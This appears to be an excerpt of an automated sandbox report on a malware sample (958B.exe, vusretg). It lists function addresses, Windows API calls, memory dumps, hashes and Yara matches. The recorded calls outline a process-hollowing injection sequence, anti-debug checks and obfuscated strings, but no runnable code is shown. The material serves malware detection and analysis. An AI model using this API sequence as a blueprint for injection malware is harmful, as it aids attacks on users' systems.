Function 0062E90C Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0062E95D

Memory Dump Source

Source File: 00000005.00000002.2370560967.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_628000_vusretg.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 9ac276c0a2238d0902c589885254c58ce4d23a5d78251fbe9ff6f74906a483ac
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 3B113C79A00208EFDB41DF98C985E98BFF5AF08350F0580A5F9489B362D371EA90DF80

Uniqueness

Uniqueness Score: -1.00%

Function 004019A2 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
Instruction ID: 689da8ed0bf63c85a60a16fbbe407e4b0918199af58fa2149c0a58fdfe32668e
Opcode Fuzzy Hash: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
Instruction Fuzzy Hash: 0E0181B6308105FADB115AD49D52FBA3719AB45751F30453BB613B80F2C53D8512FB2B

Uniqueness

Uniqueness Score: -1.00%

Function 00401992 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
Instruction ID: 9477092311c163758adf26378a137d016a4cc75b4861da4fd192d9fcf75081b0
Opcode Fuzzy Hash: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
Instruction Fuzzy Hash: 25016D72304105FADB119AD09C52EAA3729AB48355F30457BB613BD0F2C63D8552EB2B

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 958B.exePID: 3636, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	29.4%
Signature Coverage:	9.3%
Total number of Nodes:	279
Total number of Limit Nodes:	37

Executed Functions

Function 023F0110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 023F0156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 023F016C
CreateProcessA.KERNELBASE(?,00000000), ref: 023F0255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 023F0270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 023F0283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 023F029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023F02C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 023F02E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 023F0304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 023F032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 023F0399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023F03BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 023F03E1
ResumeThread.KERNELBASE(00000000), ref: 023F03ED
ExitProcess.KERNEL32(00000000), ref: 023F0412

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 93872480-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 7d3fa08ebb8371f2c5c5f56e68935cb995ada0fe98a8ef19e586179e55bd28de
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 77B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E649AB395D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00404E94 Relevance: 15.1, APIs: 10, Instructions: 93
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_lopen.KERNEL32(00000000,00000000), ref: 00404EB3
_calloc.LIBCMT ref: 00404EBB

Part of subcall function 00405348: __calloc_impl.LIBCMT ref: 0040535D

_malloc.LIBCMT ref: 00404EC1

Part of subcall function 004053D7: __FF_MSGBANNER.LIBCMT ref: 004053FA
Part of subcall function 004053D7: __NMSG_WRITE.LIBCMT ref: 00405401
Part of subcall function 004053D7: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00408E85,?,00000001,?,?,00407570,00000018,004A4F08,0000000C,00407601), ref: 0040544E

_calloc.LIBCMT ref: 00404ECB

Part of subcall function 004056E8: __fsopen.LIBCMT ref: 004056F5

_fputwc.LIBCMT ref: 00404EE2
GetTickCount.KERNEL32 ref: 00404F15
GetNamedPipeInfo.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00404F20
LoadResource.KERNEL32(00000000,00000000), ref: 00404F28
GetNumberFormatW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00404F51
PeekNamedPipe.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404F5D

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: NamedPipe_calloc$AllocateCountFormatHeapInfoLoadNumberPeekResourceTick__calloc_impl__fsopen_fputwc_lopen_malloc
String ID:
API String ID: 3757771647-0
Opcode ID: da2848016465e9781c3c9f770b1464be9aaa93a17bd497d78955feb6244c435f
Instruction ID: b4cef3b36b35bb5ee3e62315e4150979ea8575307112b8e4476909c9cb9cd172
Opcode Fuzzy Hash: da2848016465e9781c3c9f770b1464be9aaa93a17bd497d78955feb6244c435f
Instruction Fuzzy Hash: 7E21C5B1502A206AC321BFB6AC49DDF3E9CEF86395710403BF545A21A1D73C4A45CAFE

Uniqueness

Uniqueness Score: -1.00%

Function 00404BF9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(kernel32.dll), ref: 00404C03
GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 00404C7D
VirtualProtect.KERNELBASE(00000020,?), ref: 00404CA6

Strings

, xrefs: 00404C8F
kernel32.dll, xrefs: 00404BFE
VirtualProtect, xrefs: 00404C09

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: AddressLibraryLoadProcProtectVirtual
String ID: $VirtualProtect$kernel32.dll
API String ID: 3509694964-2616575124
Opcode ID: 6765ceec34b06d69dfcf2106d36f960ae1b5e966781052005410c97ac032c0b3
Instruction ID: a6118a4ea3d94cf1100268fe02cb124a5220381ef8bee283e15e66db55c54267
Opcode Fuzzy Hash: 6765ceec34b06d69dfcf2106d36f960ae1b5e966781052005410c97ac032c0b3
Instruction Fuzzy Hash: B91103714093C0DEE702E764EC487853EE5E717389F8851ADD184562B6CFBE1118C73A

Uniqueness

Uniqueness Score: -1.00%

Function 00404CAE Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 156
memorylibrarywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FoldStringW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404CD3
ChangeDisplaySettingsA.USER32(00000000,00000000), ref: 00404CDB
OpenJobObjectA.KERNEL32(00000000,00000000,00000000), ref: 00404CE4
EnumSystemCodePagesA.KERNEL32(00000000,00000000), ref: 00404CEC
GetWindowTextLengthA.USER32(00000000), ref: 00404CF3
CreateHardLinkW.KERNEL32(00000000,00000000,00000000), ref: 00404CFC

Part of subcall function 004056E8: __fsopen.LIBCMT ref: 004056F5

Part of subcall function 00404F91: __getptd.LIBCMT ref: 00405A8A

Part of subcall function 004054DB: __wcstoi64_l.LIBCMT ref: 004054C6

Part of subcall function 00404903: _ldexp.LIBCMT ref: 00404910

Part of subcall function 0040581A: __getptd.LIBCMT ref: 00405826
Part of subcall function 0040581A: _abort.LIBCMT ref: 00405848

GlobalAlloc.KERNELBASE(00000000), ref: 00404D58
GetLastError.KERNEL32 ref: 00404D70
GetCurrentProcessId.KERNEL32 ref: 00404D72
GetLargestConsoleWindowSize.KERNEL32(00000000), ref: 00404DB5
GetComputerNameA.KERNEL32(?,?), ref: 00404DC6
GetCompressedFileSizeW.KERNEL32(00000000,?), ref: 00404DE8
GetOEMCP.KERNEL32 ref: 00404DEE
LoadMenuW.USER32(00000000,00000000), ref: 00404E04
CharToOemBuffW.USER32(00000000,00000000,00000000), ref: 00404E0D
GetCharABCWidthsFloatA.GDI32(00000000,00000000,00000000,?), ref: 00404E1A
GetLastError.KERNEL32 ref: 00404E28
IsProcessInJob.KERNEL32(00000000,00000000,00000000), ref: 00404E4F
BeginUpdateResourceW.KERNEL32(00000000,00000000), ref: 00404E57
AddConsoleAliasW.KERNEL32(00000000,00000000,00000000), ref: 00404E60
AddAtomW.KERNEL32(00000000), ref: 00404E67
GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 00404E75
SetFileApisToANSI.KERNEL32 ref: 00404E7B
LoadLibraryW.KERNELBASE(msimg32.dll), ref: 00404E89

Strings

Gm , xrefs: 00404D78
msimg32.dll, xrefs: 00404E84

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: CharConsoleErrorFileLastLoadProcessSizeSystemWindow__getptd$AliasAllocApisAtomBeginBuffChangeCodeCompressedComputerCreateCurrentDirectoryDisplayEnumFloatFoldGlobalHardLargestLengthLibraryLinkMenuNameObjectOpenPagesResourceSettingsStringTextUpdateWidthsWindows__fsopen__wcstoi64_l_abort_ldexp
String ID: Gm $msimg32.dll
API String ID: 2437437345-3174439446
Opcode ID: ba798bbc3f2f2e7ad8120bc6c4128f231159a2b976cae50d26f7e4cbe0b3efd3
Instruction ID: e6b28aa2fbf78a17e00ff1cc703cc2062f444da94bee802af6c6c31f2eac8889
Opcode Fuzzy Hash: ba798bbc3f2f2e7ad8120bc6c4128f231159a2b976cae50d26f7e4cbe0b3efd3
Instruction Fuzzy Hash: DF416171402560ABC7126762ED4CDDF3E6DFF8A3957005036F659B1461CB3846868BFD

Uniqueness

Uniqueness Score: -1.00%

Function 023F0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 023F0533

Strings

0, xrefs: 023F0492
saodkfnosa9uin, xrefs: 023F04DA
d, xrefs: 023F0584
mfoaskdfnoa, xrefs: 023F0520, 023F0523

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 565cd40b9afe3fb86f777e2d17f429f9ceccc6810325f3c903e5d053686cd941
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 3F512A70D08388DAEB15CBD8D849BDDBFB66F11708F144058D5487F28AC3FA5659CB62

Uniqueness

Uniqueness Score: -1.00%

Function 023F05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 023F05EC

Strings

o, xrefs: 023F0600
apfHQ, xrefs: 023F05E2, 023F05E5

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 24bee4814d941d445f20ad527fb2bf8303be99a830f9ceb060200543017e54fe
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 4C017170C0425CEEDF14DB98D5183AEBFB5AF41308F1480D9C5492B242D7B69B58CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 022637C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 022637EE
Module32First.KERNEL32(00000000,00000224), ref: 0226380E

Memory Dump Source

Source File: 00000007.00000002.2558233012.0000000002263000.00000040.00000020.00020000.00000000.sdmp, Offset: 02263000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2263000_958B.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 107ae682b09e26830b6fade3bdbcfe9bf7932b98c4e4ccb70aabaf605bd3f521
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 45F0F6332103116FD7207BF4A88CBBE76FCEF48A25F1002A8E643910C0CB70E8858A60

Uniqueness

Uniqueness Score: -1.00%

Function 004080DD Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00405920,00000001), ref: 004080F2

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 2e6fff566365b76d370195a00a21db157dff75a0360fee3b9b0a069bdce34ec3
Instruction ID: 10a15019bc5499b930cd3ff99857d699b240ec5eac6f40928c1f00dc31ac3e14
Opcode Fuzzy Hash: 2e6fff566365b76d370195a00a21db157dff75a0360fee3b9b0a069bdce34ec3
Instruction Fuzzy Hash: BDD0A7729543056EDB109F707D0AB633BDCD788395F148476F92CCA690F6B4CA80C584

Uniqueness

Uniqueness Score: -1.00%

Function 02263485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 022634D6

Memory Dump Source

Source File: 00000007.00000002.2558233012.0000000002263000.00000040.00000020.00020000.00000000.sdmp, Offset: 02263000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2263000_958B.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 4c93c3e6e954aaa673795d15634713c97f1fcc14353a3bcd108807bc3a807bf0
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 4E112B79A00208EFDB01DF98C989E99BBF5AF08750F058094F9489B361D371EA90DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0240F030 Relevance: 19.9, APIs: 10, Strings: 1, Instructions: 696COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0240F0A7
_wcsstr.LIBCMT ref: 0240F14E
_strstr.LIBCMT ref: 0240F3D6
_malloc.LIBCMT ref: 0240F526
_memset.LIBCMT ref: 0240F534
_strstr.LIBCMT ref: 0240F57A
_malloc.LIBCMT ref: 0240F6F5
_memset.LIBCMT ref: 0240F703
_free.LIBCMT ref: 0240F7B5
_free.LIBCMT ref: 0240F7C2

Strings

", xrefs: 0240F640

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: _memset$_free_malloc_strstr$_wcsstr
String ID: "
API String ID: 430003804-123907689
Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
Instruction ID: 546ef15f33a77687f76bac4ff91890291d0725eb801a671fcd5102648dfa580f
Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
Instruction Fuzzy Hash: AA42C471508340ABD720DF64CC88B9B7BE9BF85304F04093EF98997291DB75D589CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 024000D0 Relevance: 9.7, APIs: 6, Instructions: 732COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
Instruction ID: c81c22aaeb047f122ba534a69815bfd9fc3af5fe5af5d84a3599b18d9fc857f9
Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
Instruction Fuzzy Hash: 44529F71D00218DBDF14DFA8C884BDEB7B5BF14308F10917AD819A7290E775AA89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 023FE6E0 Relevance: 8.2, APIs: 5, Instructions: 735COMMON

Download Yara Rule

APIs

_wcsstr.LIBCMT ref: 023FE72D
_wcsstr.LIBCMT ref: 023FE756
_memset.LIBCMT ref: 023FE784

Part of subcall function 0243FC0C: std::exception::exception.LIBCMT ref: 0243FC1F
Part of subcall function 0243FC0C: __CxxThrowException@8.LIBCMT ref: 0243FC34
Part of subcall function 0243FC0C: std::exception::exception.LIBCMT ref: 0243FC4D
Part of subcall function 0243FC0C: __CxxThrowException@8.LIBCMT ref: 0243FC62
Part of subcall function 0243FC0C: std::regex_error::regex_error.LIBCPMT ref: 0243FC74
Part of subcall function 0243FC0C: __CxxThrowException@8.LIBCMT ref: 0243FC82
Part of subcall function 0243FC0C: std::exception::exception.LIBCMT ref: 0243FC9B
Part of subcall function 0243FC0C: __CxxThrowException@8.LIBCMT ref: 0243FCB0

_wcsstr.LIBCMT ref: 023FEA0C
_memset.LIBCMT ref: 023FEE5C

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
String ID:
API String ID: 1338678108-0
Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
Instruction ID: 6dc42c4082fb83ac7be59b6ead0a8ea89701b1a1122d844a7a61df41f67c4114
Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
Instruction Fuzzy Hash: 0152ED71A003198FCF64CF68D884BAEBBF6BF04304F14456DE946AB2A1D7719A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040657C Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0040BFF4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040C009
UnhandledExceptionFilter.KERNEL32(00401D2C), ref: 0040C014
GetCurrentProcess.KERNEL32(C0000409), ref: 0040C030
TerminateProcess.KERNEL32(00000000), ref: 0040C037

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: c261996c4a8b1814648bdf569399d6bb6690b6aecef56ea41f0ade56002d67c8
Instruction ID: 2f5c13a37d00ac72f318432b20a90eca31078d41a524aaf082581347370df938
Opcode Fuzzy Hash: c261996c4a8b1814648bdf569399d6bb6690b6aecef56ea41f0ade56002d67c8
Instruction Fuzzy Hash: F521FAB4800202EFC780DF65EE486453FA8FB2E304F40403EE909A73A1EBB499858F5C

Uniqueness

Uniqueness Score: -1.00%

Function 02400B00 Relevance: 6.7, APIs: 4, Instructions: 660COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
Instruction ID: 639b0142174df7f4853551de9f42020a4ca490bf99410535af4b99ed3b86a61e
Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
Instruction Fuzzy Hash: 67425C71D00218DBDF14DFA4C984BDEB7B5BF08308F24416ED81AA7290E775AA85CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 023FDBE0 Relevance: 5.2, APIs: 3, Instructions: 702COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction ID: 53f9212b690c7ed27c7ca4812bde2ee6940c94a186083144a0be21339f7a17f0
Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction Fuzzy Hash: 08527470E00259DFDB50DFA8D848FAEBBB5BF49704F148198E605AB2A1DB34AD45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 024722C0 Relevance: 1.8, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

$, xrefs: 0247291E

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction ID: 52fb5dbb337430ab3cb8db1446d00d048ebb9f28f917e0e4d386b4312446a30a
Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction Fuzzy Hash: 55325FB0E002299AEF619F65CC44BEFB7B9FF44704F0441EBAA1CA2151DB758A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00409DEA Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009DA8), ref: 00409DEF

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 343815bce9346eaae17d89fa6854054a23ae4e27c26dfa32decb569fa60ecfec
Instruction ID: 2c3eadc4f1db71a715d24244e71b10292d72a07f9216d393076bd1b98b0680ad
Opcode Fuzzy Hash: 343815bce9346eaae17d89fa6854054a23ae4e27c26dfa32decb569fa60ecfec
Instruction Fuzzy Hash: E19002742911808AD65417755E0954575915EC8702B6144756441E44A5DE794450A529

Uniqueness

Uniqueness Score: -1.00%

Function 023F5DF7 Relevance: .7, Instructions: 723COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
